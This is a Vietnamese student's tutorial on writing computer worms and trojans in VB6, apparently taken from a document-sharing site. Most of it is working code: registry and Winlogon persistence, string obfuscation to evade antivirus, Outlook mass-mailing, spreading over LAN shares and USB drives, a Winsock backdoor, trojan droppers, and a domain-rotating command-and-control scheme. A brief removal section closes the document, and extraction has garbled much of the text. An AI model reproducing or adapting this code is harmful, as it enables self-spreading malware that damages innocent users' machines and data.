1. Trang chủ
  2. » Kinh Doanh - Tiếp Thị

DE HIEU THEM VE VIRUTSCACH TAO VIRURS VIRUTS

20 11 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 20
Dung lượng 343,5 KB

Nội dung

Ghi thông tin khởi động vào hệ thống (Ghi thông tin vào hệ thống để khi hệ thống khởi động vào lần sau thì vẫn còn được “Làm việc”) : Thao tác này thông thường là ghi một Key trong[r]

(1)

Virus toàn tập

Tác giả: Bảo Ngọc Chi Lâm Dũng Lớp 12 A1 - Trường THPT Nam Đàn I , Năm Học 2008 - 2009 Lý :

Tài liệu cuối cấp III (Lần xác 100%) I ABC - Định nghĩa :

Rất nhiều tài liệu định nghĩa Virus Dũng còi đưa lại phần định nghĩa từ Lạc Việt :

Một chương trình máy tính được thiết kế dạng mợt trị chơi khăm, hoặc mợt sự phá hoại ngầm, có thể tự lây lan bằng cách gắn vào chương trình khác tiến hành thao tác vơ ích, vô nghĩa, thao tác phá hoại Khi một vi rút nhiễm vào đĩa, nó tự lây lan bằng cách gắn vào chương trình khác hệ thống, kể phần mềm hệ thống Giống vi rút người, tác hại của vi rút máy tính có thể chưa phát được thời gian vài ngày hay vài tuần Trong thời gian đó đĩa đưa vào hệ máy mang theo một ẩn của vi rút đó - đĩa bị nhiễm vi rút Khi vi rút phát tác, chúng gây nhiều hậu : từ những thông báo bậy bạ đến những tác động làm lệch lạc khả thực của phần mềm hệ thống, hoặc xóa thông tin đĩa cứng Không phải thông báo bậy bạ vi rút gây

Okie, thật đơn giản Virus = Một chương trình -> Khơng phải mợt đó q phức tạp hay khó khăn để viết một virus (Có nhiều người, kể Dũng còi trước nghĩ ngược lại)

II Phân tích :

Nên phân biệt cho rõ virus, worm, trojan, adware bạn

Bạn nên chú ý phân biệt từ virus (Nói chung) bao gồm worm, Trojan với virus (Nói riêng) tên cụ thể của một virus

Virus: Là một chương trình đúng định nghĩa virus (Nói chung), nhiên nó hoạt động chủ yếu lây nhiễm trực tiếp vào file đối tượng

Ví dụ :

Cụ thể chèn thân nó vào file exe với những vị trí thích hợp (Các virus thơng thường chèn vào cuối file sau đó thêm một vài lệnh đoạn Byte đầu file để thực lệnh “Nhảy” từ đoạn mã tới đoạn code virus) Một vài virus Dũng còi nhận thấy việc nó chèn tồn bợ nó vào đoạn đầu của chương trình (Chương trình gốc phía sau đoạn Byte này) Nó tự động sửa đổi Icon cho giống file gốc

Làm việc :

Phần lớn virus làm việc bị kích hoạt vào file bị lây nhiễm (Tiếp tục thao tác lây nhiễm) sau đó trả lại quyền làm việc lại cho chương trình ban đầu)

Tuy nhiên, theo Dũng cịi nhận thấy, có một vài (Không nhiều) tự động “Tách tốp” thành một file riêng làm việc chế độ thường trực (Loại “Lai” với worm)

Tác hại :

Trong tất loại virus (nói chung) Dũng cịi ớn thằng nếu loại (Worm,Trojan ) cịn để mà diệt chứ cịn loại phải “Mổ” file “Dính chưởng” sau đó thực việc tách đọan Byte riêng biệt cứu được phần data bị nhiễm (Nếu virus nó mà mã hóa phần pó tay)

Rõ ràng việc mà loại gây chiếm dung lượng không nhỏ của ổ đĩa nơi lưu trữ chúng (Thông thường PC nhiễm Virus kéo theo có nhiều file đó bị lây lan)

Qúa trình thực thi file (Khi file đó bị nhiễm) chậm bình thường (Khó nhận lắm)

Nhiều thằng lập trình viên nó ngồi code ẩu, làm mợt vài byte của file gốc hay lẫn lộn chi đó => Dữ liệu ban đầu coi hư (Ít xảy có)

(2)

Đây loại virus (Nói chung) nhiều Làm việc :

Không có chi hiểu hay phức tạp loại Một Worm có “Công việc” sau (Các công việc mà sâu phải làm)

1 Tự chép vào thư mục của hệ thống (Worm muốn “Sống lâu” luôn làm thao tác này)

2 Ghi thông tin khởi động vào hệ thống (Ghi thông tin vào hệ thống để hệ thống khởi động vào lần sau cịn được “Làm việc”) : Thao tác thông thường ghi một Key Regedit, tạo một file đặc biệt với cấu trúc có sẵn (Sẽ nêu rõ phần sau), tự chép vào những vị trí đặc biệt mà hệ điều hành tự load nó khởi động (Có không nhiều file có “Vinh dự” được hệ điều hành load khởi động)

3 Thao tác lây truyền : Công việc thông thường worm “Nằm chờ” thỏa điều kiện đó tiến hành lây lan (Như việc thấy có ổ đĩa USB “Lây”)

Cịn sau mợt số cơng việc mà một số worm làm (Dù không nhiều lắm) : KeyLog : Ok, ghi lại bàn phím ( chà, khơng khó với mức đơn giản đâu) BackDoor (Mở cử hậu) : Dù “Cổ lỗ sĩ” lắm đó

3 Bom hẹn : Mợt số lập trình dziên dzui tính, cứ tới “Ngày lành tháng tốt” hay “Giờ lành” cho worm “Làm dziệc” (Nguyên tắc “Bom hẹn giờ”)

4 Bát nháo một chút : Một chút “Tưng tưng” cho “Vui nhà vui cửa” đó những mà lập trình dziên dzui tính (Như Dũng cịi) hay làm với worm của

Tác hại :

Ngốn RAM hệ thống : Luôn

Ngốn đường truyền net (Nếu worm đó “Sài” net)

Trojan : Okie, thỏa mãn định nghĩa virus nè, cộng thêm phần nữa Nó không tự lây lan mà nó ẩn mợt chương trình có ích mợt đó “Hay hay”, nhiên đó lại chứa mợt đó “Hổng có hay” Nên nhớ Trojan khác với virus, Trojan thân chương trình ban đầu “Có vấn đề” cịn virus ban đầu “Vơ tợi” (File nạn nhân ban đầu hồn tồn khơng dính đến virus)

Làm việc :

Trojan thông thường có cách làm việc :

1 Thực trực tiếp cơng việc “Bất chính” bạn kích hoạt nó

2 Tự động “Thả” một “Nằm vùng” PC của bạn sau đó kích hoạt (Đây cách thường thấy) Cái đằng sau “Làm việc” nè

Công việc thường thấy của Trojan mở của hậu (Backdoor : Nói cho dễ hiểu mở mợt cổng để chờ tín hiệu từ server, hoặc kết nối trực tiếp với server của người điều khiển)

Tuy nhiên nói vậy thui chứ thể loại ta làm mà chẳng được (Thả worm, adware, spyware ) vô tư em

Tác hại :

Có một điều trớ trêu Trojan thường soft dành cho bọn tự gọi “Hacker” (Hổng biết có phải dzậy khơng nữa, soft theo Dũng cịi “Kiểm định” phần đơng Trojan) Mợt số khác phần mềm Free (Ui chao đau đớn làm sao)

III Viết thử coi nhá :

(Trong giới hạn mình, Dũng hướng dẫn Worm Trojan) Chà viết virus có dễ khơng ?

chà, dễ ịm Khơng tin à, nhìn thử coi 1 Bảo mật liệu dạng String :

Như Dũng còi phân tích, việc để “Lịi” dữ liệu dạng mợt khiếm khún của mợt số phần mềm (Dũng cịi lấy thành công PassWord của data (Làm bằng Access) của một phần mềm độ sộ (Quên tên tiêu rùi) bằng cách sài Notepad truy tìm hàm truy vấn SQL chuỗi Byte)

Với một virus (Nói chung) nếu để lộ đoạn string đúng mợt thảm họa (Các AV lập tức “Túm cổ” nó phân tích, người dùng dễ dàng làm “Thịt” virus của bạn)

(3)

Đơn giản thay chúng ta giữ nguyên chuỗi String chương trình chúng ta phân tích Byte chuỗi đó theo một nguyên tắc định sau đó “Ráp lại” :

Ví dụ : Dùng cách quy đổi theo bảng mã Ascii :

“DungCoi”= Chr(68)+Chr(117)+Chr(110)+Chr(103)+Chr(67)+Chr(111)+Chr(105)

Đoạn code để phân tích Byte đơn giản bằng hàm Chr (Nếu nhác tải Source RealWorm sau đó vơ thư mục Soft mà tìm Ascii Dũng viết sẵn)

2 Tạo key khởi động :

Các bạn nên chú ý với phương pháp ghi key bằng kiểu Set reg = CreateObject("WScript.Shell")

reg.regwrite "HKEY_LOCAL_MAHINE\Software\Microsoft\Windows\CurrentVersion\Run\Start", App.Path + "\" + App.EXEName + ".exe"

Sẽ bị gần tất AV phát -> Dù đơn giản không nên sài

Phần Dũng trích lại từ mợt viết trước : ‘========================================= I.1 Khởi động hợp pháp :

- Khởi đợng theo cách “Chính quy” Có nghĩa nó hồn tồn “Hợp pháp” theo ch̉n mực của mợt phần mềm thông thường (Cách worm,Trojan thường sài )

Có phương thức sau :

I.1.a Ghi Key Regedit theo địa sau :

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Code : Module : Option Explicit

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal

lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long

Public Const REG_SZ = ' Unicode nul terminated string Public Const REG_BINARY = ' Free form binary Public Const HKEY_CURRENT_USER = &H80000001

Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String) Dim Ret

RegCreateKey hKey, strPath, Ret

RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData) RegCloseKey Ret

End Sub

Sub DelSetting(hKey As Long, strPath As String, strValue As String) Dim Ret

RegCreateKey hKey, strPath, Ret RegDeleteValue Ret, strValue RegCloseKey Ret

End Sub

Form :

(4)

Private Sub Form_Load() If Len(App.Path) <> Then

AppVirus = App.Path + "\" + App.exename + (“.exe”) Else

AppVirus = App.Path + App.exename + (“.exe”) End If

SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "DungCoi", AppVirus ‘ DelSetting HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "DungCoi" ‘Thao tác xóa Key

End Sub

‘Chú ý : Phần DungCoi Tên Key ‘ Phần AppVirus đường dẫn File của bạn

I.1.b Phương pháp sử dụng thư mục khởi động :

C:\Documents and Settings\DungCoi\Start Menu\Programs\Startup

DungCoi = Tên sử dụng hệ thống

I.1.c Phương pháp sử dụng tập tin đặc biệt :

Có một số tập tin mà ghi thông tin với cấu trúc định nó khởi đợng chương trình chúng ta mong muốn khởi động hệ thống (Win.ini System.ini)

Thui lên quantrimang.com mà đọc I.1 Khởi động bất hợp pháp :

- Việc nó khơng theo “Quy định” từ trước khiến nó người phát thậm chí MSCONFIG ko thể nhận

- Tuy nhiên, cần chú ý nếu bạn chưa hiểu hết công việc của Key phần ko nên đụng tới (Nếu ẩu có thể làm hệ điều hành khởi động không được)

- À, cần nhắc thêm Do những phương pháp tác động sâu vào hệ thống nên nguy hiểm nếu không hiểu hết chất của chúng

Sửa đổi Key Regedit :

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell Code : (Code mẫu với Key Userinit )

Ban chú ý phương pháp cho phép chương trình của chúng ta được khởi động chế độ Safe Mode (Rất đáng nể đấy)

Module : Option Explicit

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Declare Function RegCreateKey Lib "advapi32.dll" _

Alias "RegCreateKeyA" ( _ ByVal hKey As Long, _ ByVal lpSubKey As String, _ phkResult As Long) As Long

Declare Function RegSetValueEx Lib "advapi32.dll" _ Alias "RegSetValueExA" ( _

ByVal hKey As Long, _

ByVal lpValueName As String, _ ByVal Reserved As Long, _ ByVal dwType As Long, _ lpData As Any, _

(5)

Public Const REG_SZ = Public Const REG_BINARY =

Public Const HKEY_CURRENT_USER = &H80000001 Public Const HKEY_LOCAL_MACHINE = &H80000002

Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String) Dim Ret

RegCreateKey hKey, strPath, Ret

RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData) RegCloseKey Ret

End Sub Form :

Dim AppVirus As String Dim PathExp As String Private Sub Form_Load()

PathExp = “C:\Windows\explorer.exe” If Len(App.Path) <> Then

AppVirus = App.Path + "\" + App.exename + (“.exe”) Else

AppVirus = App.Path + App.exename + (“.exe”) End If

Shell PathExp

SaveString HKEY_LOCAL_MACHINE, “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”, “Userinit”, AppVirus

End Sub

‘Phần AppVirus đường dẫn File của bạn

‘Câu lệnh Shell PathExp cần thiết (Không tin xóa nó chạy thử đi)

Chú ý : Đoạn code có giá trị chương trình biên dịch (Tuyệt đối không chạy thử chưa biên dịch, phải biên dịch được chạy thử)

Muốn thấy hiệu cứ chạy File biên dịch ấy, khởi động lại thấy kết liền. Với kỹ thuật chương trình của chúng ta được khởi động Safe Mode. 3 Lây nhiễm :

Yeah, một những thao tác đòi hỏi nhiều “Sáng tạo” đó nha a Email :

Nguyên tắc đó sử dụng OE (Outlook Explorer) có sẵn thông tin từ OE để khai thác gửi email tới đối tượng kế tiếp Tuy nhiên lâu đời nên khơng cịn sài (Cứ tham khảo vui nhé)

Dim AppVirus As String If Len(App.Path) <> Then

AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101)) Else

AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101)) End If

Set go = CreateObject(fgo)

(6)

‘Các bạn chú ý : Tất dữ liệu dạng String được Dũng còi qua mã Ascii để trách AV dễ dàng phát Set MAPI = out.GetNameSpace(Chr(77) + Chr(65) + Chr(80) + Chr(73))

Set a = MAPI.AddressLists(1) For X = To a.AddressEntries.Count Set Mail = St.CreateItem(0)

Mail.To = St.GetNameSpace(Chr(77) + Chr(65) + Chr(80) + Chr(73)).AddressLists(1).AddressEntries(X) Mail.Subject = “Tên nợi dung Mail” ‘Ví dụ : Anh Dũng còi đẹp giai nhức làng

Mail.Body = “Nợi dung email” ‘Ví dụ : Coi hình người iu Dũng còi nè Mail.Attachments.Add = AppVirus ‘Đây phần file đính kèm

Mail.Send Next St.Quit

b LAN không ?

Lây truyền mạng LAN gồm thao tác :

1 Xác định thư mục chế độ Share full (Cho phép sửa đổi) Thực thao tác Copy

Trong bước khơng có đáng nói (FileCopy)

Cái khó thao tác thứ nhất, q trình “Nghiên kíu” Dũng cịi tìm phương thức Sài hàm API để xác định thư mục Share

2 Sài một công cụ trung gian của Windows lệnh hỗ trợ sẵn của hệ điều hành Dùng cách đọc loạt key regedit

Cách số khó quá, Dũng còi biết có thể chứ làm ứ Dũng cịi có thể trình bày cách sau :

1 Command :

Nguyên tắc của cách kêu hệ điều hành làm theo lệnh (Tìm ghi đường dẫn thư mục Share Full vào tập tin) Sau đó tiến hành đọc tập tin thực thao tác copy

Dim AppVirus As String If Len(App.Path) <> Then

AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101)) Else

AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101)) End If

Dim ishell

Set ishell = CreateObject("wscript.shell")

ishell.run "%comspec% /C net view > C:\plog.tmp", 0, True Set fso = CreateObject("scripting.filesystemobject")

Set rd = fso.opentextfile("C:\plog.tmp") nbuff =

Do While rd.AtEndOfStream <> True nbuff = rd.readline

If Left(nbuff, 2) = "\\" Then

ishell.run "%comspec% /C net view " & Trim(Left(nbuff, 21)) & " > C:\clog.tmp", 0, True

Set rdd = fso.opentextfile("C:\clog.tmp") buff = ""

(7)

combuff = Right(Trim(buff), 4) If Right(combuff, 4) = "Disk" Then buffadd = Left(buff, 13)

If Len(Trim(buffadd)) > Then

sharename = a & Trim(Left(nbuff, 21)) & "\" & Trim(buffadd) & a FileCopy AppVirus, sharename & "\" & appl & ".exe"

End If End If Loop End If Loop

Chú ý : Hầu hết AV chặn cách này, nhiên cách làm việc tuyệt vời (Liệt kê hoàn hảo) 2 Regedit :

Nguyên tắc cách thực thao tác đọc hàng loạt Key Regedit (Các thông số hệ điều hành tự ghi nhận từ trước)

Dim AppVirus As String If Len(App.Path) <> Then

AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101)) Else

AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101)) End If

Const HKCU = &H80000001 Dim ObjFS

Set ObjFS = CreateObject("Scripting.FileSystemObject") Set ObjReg = GetObject("winmgmts:\\.\root\" & _

"Default:StdRegProv")

strKeyPath = "SOFTWARE\Microsoft\Windows\" & _ "CurrentVersion\Explorer\WorkgroupCrawler\Shares" ObjReg.EnumKey HKCU, strKeyPath, arrSubKeys For Each subkey In arrSubKeys

ObjFS.CopyFile AppVirus,"\\" & subKey & "/dungcoi.exe" , True ‘Có thể dùng hàm FileCopy thay cho việc dùng hàm

Next

Chú ý : Cách liệt kê không tốt bằng cách hầu hết AV không chặn lại. c USB = Mốt :

Flashy worm lây lan mạnh Việt Nam tháng 1/2007 vậy mà có vỏn vẹn một tính tính ghi mợt Key Regedit mà thui (Hic hic, sinh sau đẻ muộn Dũng cịi khơng muốn phát tán nên RealWorm (Với ông Bkis cập nhật DakNong) xếp vị trí thứ hà buồn thiệt nha híc híc)

Con worm dungcoi vơ tình để “Xổng chuồng” (Hồi đó tai nạn mà để nó lọt ngoài) Mà nó lây bên Campuchia (Phải tốn tuần để kiểm định thơng tin đó), cịn nước hổng rõ nó tới đâu ùi

Dù nó lợi hại vậy thực tính đơn giản dễ làm Hồi trước nghiên cứu tính Dũng cịi chia cơng việc sau : Tìm ổ đĩa USB (Xem có tồn không)

- Liệt kê tất ổ đĩa

- Kiểm tra xem ổ đĩa đó, ổ đĩa đĩa giao tiếp qua USB (Loại đĩa rời khác đĩa mềm) Tìm tồn bợ thư mục (Lây vơ hết ln cho vui)

3 FileCopy (Qúa đơn giản)

(8)

‘Code boi Dung Coi

‘Email : dungvoivb@gmail.com Private Sub Form_Load() Dim AppVirus As String If Len(App.Path) <> Then

AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101)) Else

AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101)) End If

Dim d, dc Dim fso, cf

Set fso = CreateObject("Scripting.FileSystemObject") Set dc = fso.Drives

For Each d In dc

If (d.DriveType = 1) And (UCase(Left(d, 1)) <> "A") Then Set cf = fso.GetFolder(d).subfolders

For Each fil In cf

If TonTai(fil.Path & "\" & fil.Name & (Chr(46) + Chr(101) + Chr(120) + Chr(101))) = False Then FileCopy AppVirus, fil.Path & "\" & fil.Name & (Chr(46) + Chr(101) + Chr(120) + Chr(101))

TimThuMuc (fil.Path) Next

End If Next End Sub

‘===================================== Private Sub TimThuMuc(ThuMuc As String) ‘Thao tác tìm thư mục

Dim fso, cf, fil, ext

Set fso = CreateObject((Chr(83) + Chr(99) + Chr(114) + Chr(105) + Chr(112) + Chr(116) + Chr(105) + Chr(110) + Chr(103) + Chr(46) + Chr(70) + Chr(105) + Chr(108) + Chr(101) + Chr(83) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(79) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + Chr(116)))

'Scripting.FileSystemObject

Set cf = fso.GetFolder(ThuMuc).subfolders For Each fil In cf

FileCopy AppVirus, fil.Path & "\" & fil.Name & (Chr(46) + Chr(101) + Chr(120) + Chr(101)) TimThuMuc (fil.Path)

Next End Sub

‘===================================== Private Function TonTai(filename) As Boolean ‘Kiểm tra sự tồn của File

On Error GoTo ErrorHandler TonTai = (Dir(filename) <> "") Exit Function

ErrorHandler: TonTai = False End Function

d BackDoor (Mở cửa hậu):

Chán chết, ngồi “Mổ cị” PC nó “Sinh sự” làm phần viết BackDoor nên ứ them gõ lại nữa mệt quá, nói sơ qua phần thui :

BackDoor : Kỹ thuật mở cổng hoặc kết nối trực tiếp tới một PC khác, sau đó từ Server đó có quyền làm thứ PC nạn nhân (Victim) Như vậy sự kết nối giữa PC với

(9)

- Việc kết nối PC thông thường sài Control trung gian, hoặc nếu tự viết đó ngốn dung lượng worm lớn Cả điều trái với nguyên tắc viết worm thông thường (Phải sử dụng thêm Control làm tăng khả phát sinh lỗi thiếu thư viện, dung lượng cao tức linh hoạt)

- Số lượng worm có thể lớn để từ server mà thằng cha viết worm ngồi “Nghiên kíu” cho hết

- Việc sử dụng kỹ thuật nguy hiểm cho worm (sẽ bị FireWall phát chặn lại ngay) Như vậy hoàn tồn khơng thích thú cho lập trình viên viết nó (Worm)

- Thế mạnh của Trojan có thể đáng “Trúng mục tiêu” định (Trojan không lây lan nha)

Trong viết Dũng còi hướng dẫn cách kết nối PC (Nếu bạn muốn nghiên cứu kỹ có thể lên www.quantrimang.com để đọc một viết hay chủ đề này) :

Nguyên tắc :

Vấn đề giúp bạn giải quyết đó việc kết nối PC với bằng cách dùng Winsock

Việc đơn giản, bạn cần tạo Control Winsock phần Clinet-Server (Máy khác-Máy chủ) làm cho chúng có thể liên lạc với

Thực :

Bước : Tạo một dự án

Trong bước bạn ấn chọn Standard EXE Bước : Thêm Control Winsock

Để thực thao tác bạn chọn theo thực đơn Project -> Components (Hoặc nhắn tổ hợp phím Ctrl+T )

Sau hiển thị hộp thoại bạn chịn Tab Controls (Mặc định Tab này), bạn tìm tên Microsoft Winsock Control 6.0 đánh dấu chọn nhấn chọn OK

Bước :

Hãy vẽ Control theo hình sau (Khơng cần phải thay đổi tḥc tính Name)

Bước :

Nhập mã lệnh cho chương trình

Trong cử sổ lệnh bạn nhập đoạn code sau :

Private Sub Command1_Click() Winsock2.Close

‘Đóng tất kết nối của Winsock (Nếu có) Winsock2.Connect “127.0.0.1”, 1234

‘Kết nối tới số IP 127.0.0.1 với cổng 1234 End Sub

(10)

‘Gửi gói dữ liệu với nội dung của TextBox End Sub

Private Sub Form_Load() Winsock1.LocalPort = 1234

‘Cổng nhận dữ liệu Winsock1.Listen

‘Bắt đầu đọc dữ liệu từ cổng xác lập End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requested As Long) ‘Biến cố ghi nhận kết nối

Winsock1.Close ‘Đóng kết nối Winsock1.Accept requested

‘Chấp nhận kết nối với nơi gửi lệnh kết nối MsgBox “Da ket noi cong”

‘Thơng báo hồn thành kết nối End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) ‘Biến cố ghi nhận dữ liệu

Dim data As String

‘Khai báo biến lưu trữ gói tin nhận được Winsock1.GetData data

‘Ghi dữ liệu nhận được vào biến MsgBox data

‘Thông báo gói dữ liệu End Sub

e Kỹ thuật chèn Trojan :

Như định nghĩa Trojan, kỹ thuật “Thả “ những thứ đen tối của Trojan có kỹ thuật kỹ thuật đáng nói (Kỹ thuật khỏi cần nói rồi)

Kỹ thuật kỹ thuật trích xuất Trojan từ soft Về có cách làm sau :

1 Tải chương trình muốn kích hoạt chạy từ mợt URL sau đó kích hoạt chúng Chèn file đó vào cuối chương trình, sau đó thao tác xử lý file

3 Tiến hành “Nhốt” Trojan vào Resource (Với VB6) Sau đó trích xuất chúng

Trong cách có kỹ thuật thứ kỹ thuật đơn giản nên Dũng còi hướng dẫn kỹ thuật (Chỉ áp dụng cho ứng dụng bạn viết thui nha) :

1 Tạo một Resource chứa trojan Tạo Module chứa đoạn code sau : Public Enum AppResource

appresBLANK_MDB = 101 appresMY_DAUGHTER = 102 appresNT_LOGON_SOUND = 103 appresMY_WIFE = 104

End Enum

' -' Author: Clint M LaFever [lafeverc@saic.com] ' Purpose: Extracts a file from the resource file and save ' the file to the destination passed in

' Date: October,18 1999 @ 11:45:53

' -Public Function TaoFile(destFILE As String, resID As AppResource, Optional resTITLE As String = "CUSTOM") As String

On Error GoTo ErrorBuildFileFromResource Dim resBYTE() As Byte

(11)

Put #1, , resBYTE Close #1

BuildFileFromResource = destFILE Exit Function

ErrorBuildFileFromResource: Exit Function

End Function

3 Trong form gõ đoạn code sử dụng Function để trích xuất Shell chúng Okie, đơn giản (Lười nên Dũng còi nói sơ qua vậy thui hà)

f Kỹ thuật viết worm “Nghe lời” :

Để một sâu có thể tự động cập nhật phiên mới, thay đổi những thông điệp để lây truyền qua Y!M, bắt sâu (Trên máy tính nạn nhân) phải làm mợt số việc đó mà chúng ta muốn (Tất nhiên cần phải thiết kế sẵn tính này) Chúng ta phải sử dụng một kỹ thuật cực kỳ thú vị

Các bạn trách nhầm lẫn với kỹ thuật BackDoor “Cổ truyền” nha, kỹ thuật dựa vào khả Download phần tích lệnh để điều khiển tồn bộ worm

Nguyên tắc :

Thực việc download file nài đó (URL cố định) máy tính nạn nhân Sau đó tiến hành phân tích sử lý công việc theo yêu cầu người viết

Code (Đây code mẫu của Control Download, source mẫu bạn có thể xem source RealWorm) ‘Programmed by David Nedved (Neddy)

Option Explicit

Public Event Progress(DownLoadedBytes As Long, TotalBytes As Long, sID As String) Public Event Completed(Bytes As Long, sID As String)

Private colDest As New Collection

Public Sub Download(sWWWFile As String, sDestination As String, Optional sID As String = "Id") On Error Resume Next

colDest.Add sDestination, sID

UserControl.AsyncRead sWWWFile, vbAsyncTypeFile, sID, vbAsyncReadForceUpdate End Sub

Private Sub UserControl_AsyncReadComplete(AsyncProp As AsyncProperty) On Error Resume Next

Name AsyncProp.Value As colDest.Item(AsyncProp.PropertyName) colDest.Remove AsyncProp.PropertyName

RaiseEvent Completed(AsyncProp.BytesRead, AsyncProp.PropertyName) End Sub

Private Sub UserControl_AsyncReadProgress(AsyncProp As AsyncProperty)

RaiseEvent Progress(AsyncProp.BytesRead, AsyncProp.BytesMax, AsyncProp.PropertyName) End Sub

Public Sub CancelDownload(Optional sID As String = "Id") UserControl.CancelAsyncRead sID

End Sub

Private Sub UserControl_Resize() UserControl.Height = "495" UserControl.Width = "495" End Sub

g Kỹ thuật tạo quyền điều khiển :

(12)

Nếu bạn nghĩ việc tạo nhiều tên miền dự phòng hoàn toàn sai, tất chúng lần lượt bị “Hành

quyết” Như vậy cách không mặc định cho worm tên miền trước đó chúng tự biết cách thay đổi danh sách tên miền từ những dữ liệu từ một Domain đó danh sách đó

Đây kỹ tḥt lập trình “Sâu bọ” mà Dũng còi tốn nhiều thời gian đáng để tự hào Mợt kỹ tḥt lập trình địi hỏi kỹ lập trình net chủ yếu khả lập trình xử lý file

Các thao tác của kỹ thuật :

1 Ngay sau biên dịch, tiến hành chèn một List (Danh sách) tên miền điều khiển Thiết lập file dữ liệu điều khiển worm từ tên miền

3 Sau lây lan worm đặng kiểm tra sự tồn của tên miền List tên miền của có (Kiểm tra qua thao tác Download file)

4 Tại một tên miền cịn tồn sử dụng tên miền đó làm tên miền để tải file Tải toàn bộ file dữ liệu lệnh (Gồm file chứa List tên miền ln được cập nhật)

6 Trích xuất List tên miền bằng thao tác phân tích worm (Một List tên miền được “Chèn” sẵn worm)

7 So sánh List tên miền vừa down được với List của nó (Chứa worm) Nếu List có sự khác biệt tự động trình thay thế List cũ bằng list

9 Tự đợng kích hoạt file được tạo (Bản thân worm worm đó được chèn vào đó List tên miền mới) Chú ý : Tồn bợ thông tin List tên miền được mã hóa.

Okie, một worm tuyệt vời Nhưng kỹ thuật khó thực rõ ràng với cách trình bày của Dũng cịi khó hiểu Thơi xem mợt source mợt worm mà Dũng cịi sử dụng kỹ thuật vậy (Đó worm vbvn)

Lưu ý : Kỹ thuật thích hợp để chơi trị “Mèo vờn cḥt” với bác an ninh mạng (Các worm bình thường Gái Xinh tên miền tất cả, cịn với kỹ tḥt thậm chí trăm tên miền nếu chúng ta online đặng khó quyền điều khiển trừ List tên miền của chúng ta bị bác an ninh mạng giải mã thành công) Tuy nhiên, với “Trị chơi” vậy nếu bị tóm cổ bác khơng “Nương tay” cho bạn đâu Thận trọng

h Kỹ thuật tự bảo vệ :

Hầu hết worm lây lan Việt Nam gần không có sự phòng thủ Việc tệ với Vxer Vì vậy mợt ngun tắc bảo vệ cần thiết

Có một số cách tự bảo vệ sau :

- Ẩn process (Khó có thể bị kill nếu không sài tới soft chuyên nghiệp)

- Kỹ thuật tạo process tự bảo vệ lẫn (Đã sử dụng worm DungCoi cải tiến lớn RealWorm) Kỹ thuật không phức tạp, bạn có thể tham khảo source VBVN để xem khả ẩn process (Kể WinXP), xem Source RealWorm (Bkis đặt tên nó w32.DakNong Worm) để xem khả tự bảo vệ IV Tiêu diệt :

Viết Virus, đó rõ ràng thú vui (Ít điều đó đúng với Dũng cịi) Và tất nhiên, “Thú vui” rùi Dũng không muốn phát tán (Trong worm Dũng viết có vơ tình bị lây lan ngồi) Dù việc viết worm xấu, rõ ràng nhờ nghiên cứu nó mà Dũng còi có thêm những kiến thức hệ thống, virus AV Việc khiến Dũng cịi tự tạo cho mợt liều “Vắc xin” để phòng ngừa Virus

Trong phần này, Dũng còi cách tiêu diệt loại worm thông thường (Và một số loại đặc biệt) 1 Dùng phần mềm trung gian :

Các phần mềm AV khơng cần phải nói, nhiên với nhiều virus mà AV chưa cập nhật chúng ta cịn đường diệt thủ cơng mà thơi Okie, diệt chúng nhá

(13)

Process Explorer : Đây một phần mềm chuyên nghiệp dùng để theo dõi chương trình hoạt đợng hệ thống

Autoruns : Đây chương trình quản lý tất chương trình tự đợng được khởi đợng khởi đợng máy tính

Cả chương trình có thể tải miễn phí địa : http://www.sysinternals.com

a Nhận dạng :

a.1 Chương trình hoạt động :

Bạn có thể sử dụng Process Explorer để xem chương trình khởi động hệ thống

Dựa theo kinh nghiệm với đường dẫn chương trình ProcessXP xác định bạn có thể dễ dàng nhận có hay không sự tồn của virus hệ thống

a.2 Key khởi động :

Hầu tất virus tự tạo Key khởi đợng riêng cho để được hệ điều hành mở vừa khởi động máy vậy mợt phương pháp hiệu

Mợt virus điển hình mợt chương trình hoạt động hệ thống có key khởi động hệ điều hành (Hãy thận trọng trước “Phán qút” mợt chường trình đó

có phải virus hay không) b Dọn dẹp :

